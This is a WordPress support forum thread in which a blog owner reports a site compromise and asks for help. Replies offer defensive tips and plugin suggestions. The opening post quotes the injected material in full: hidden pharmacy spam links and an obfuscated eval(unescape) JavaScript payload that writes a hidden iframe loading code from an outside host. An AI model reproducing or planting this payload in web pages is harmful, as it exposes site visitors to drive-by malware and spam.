Title: WordPress Exploit: script inserted into code
Last modified: August 19, 2016

---

# WordPress Exploit: script inserted into code

 *  [andiz](https://wordpress.org/support/users/andiz/)
 * (@andiz)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/)
 * Lately some of my WordPress blogs have been targeted by some hacker. Everytime
   I check out the source of my blogs I see these kind of links:
 *     ```
       </body></html><font style='position: absolute;overflow: hidden;height: 0;width: 0'>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra.htm"; title="buy viagra">buy viagra</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online.htm"; title="buy viagra online">buy viagra online</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online-viagra.htm"; title="buy viagra online viagra">buy viagra online viagra</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=viagra-buy.htm"; title="viagra buy">viagra buy</a>
       ```
   
 * It has nothing to do with my theme, I’m using my own theme and I am 100% sure
   that the theme is not the source of the problem.
 * I have been monitoring my weblogs to see what the cause of the problem is. Here
   is a list of what I tried to stop it:
 * – Upgrade to the latest WP (Yet it kept coming back)
    – Secure WP admin with 
   htaccess (No effect) – Change FTP password – Check permissions of files and folders–
   Check plugins
 * Another thing that I noticed is the following. Almost all of my themes also had
   the following code inserted at the end of the source code:
 *     ```
       <Script>
       <!--
       var d=document;
       eval( unescape( "%69%66%20%28%21%6d%79%69%61%29%20%7b%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%28%65%6c%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%29%2e%6c%65%6e%67%74%68%29%7b%69%66%28%20%28%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%5b%69%5d%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%5b%69%5d%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%5b%69%5d%2e%6e%61%6d%65%21%3d%63%31%20%29%20%7b%65%6c%5b%69%5d%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%5b%69%5d%29%3b%7d%69%20%2b%2b%3b%7d%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%34%35%37%30%29%2b%27%33%66%61%66%61%30%30%64%36%62%5c%27%20%77%69%64%74%68%3d%31%30%37%20%68%65%69%67%68%74%3d%35%31%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%0d%0a%09%09%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c1439772935;
       //-->
       </Script>
       ```
   
 * What I noticed is that the only solution was to rewrite the old WordPress files
   with the ones that I downloaded. I finally found where the code was being inserted:
   index.php in the root folder of the weblog.
 * I would like to know the following things:
 * – Is this because of my setup or is this some new WP exploit?
    – What can I do
   to stop these kind of exploits in the future?
 * Thanks!

Viewing 6 replies - 16 through 21 (of 21 total)

[←](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/?output_format=md)
[1](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/?output_format=md)
2

 *  [macsoft3](https://wordpress.org/support/users/macsoft3/)
 * (@macsoft3)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718256)
 * I would create a new administrative username for WP deleting all others. If they
   know your administrative username, they can just run a program to guess the password
   just like guessing a PIN number.
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718258)
 * Attack repeated. I’ve already changed password and did all the stuff, but they
   somehow managed to change index files to files pointing to their site pizdec 
   dot ru. It is other guys using the same software – previous attack used to promote
   another site.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718259)
 * segal, I **really** recommend using my [post-logger](http://www.village-idiot.org/post-logger)
   plugin.
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718260)
 * > segal, I really recommend using my post-logger plugin.
 * Thanks, installed.
 *  [Sonika](https://wordpress.org/support/users/sonika/)
 * (@sonika)
 * [18 years ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718269)
 * Plugin “anti xss attak” maybe help you?
    for wp 2.5: [http://mywordpress.ru/plugins/anti-xss-attack/2/](http://mywordpress.ru/plugins/anti-xss-attack/2/)
   for wp 2.3.3: [http://maxsite.org/anti-xss-attack-update](http://maxsite.org/anti-xss-attack-update)
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [18 years ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718270)
 * Spasibo!

Viewing 6 replies - 16 through 21 (of 21 total)

[←](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/?output_format=md)
[1](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/?output_format=md)
2

The topic ‘WordPress Exploit: script inserted into code’ is closed to new replies.

 * In: [Developing with WordPress](https://wordpress.org/support/forum/wp-advanced/)
 * 21 replies
 * 12 participants
 * Last reply from: [segal](https://wordpress.org/support/users/segal/)
 * Last activity: [18 years ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718270)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics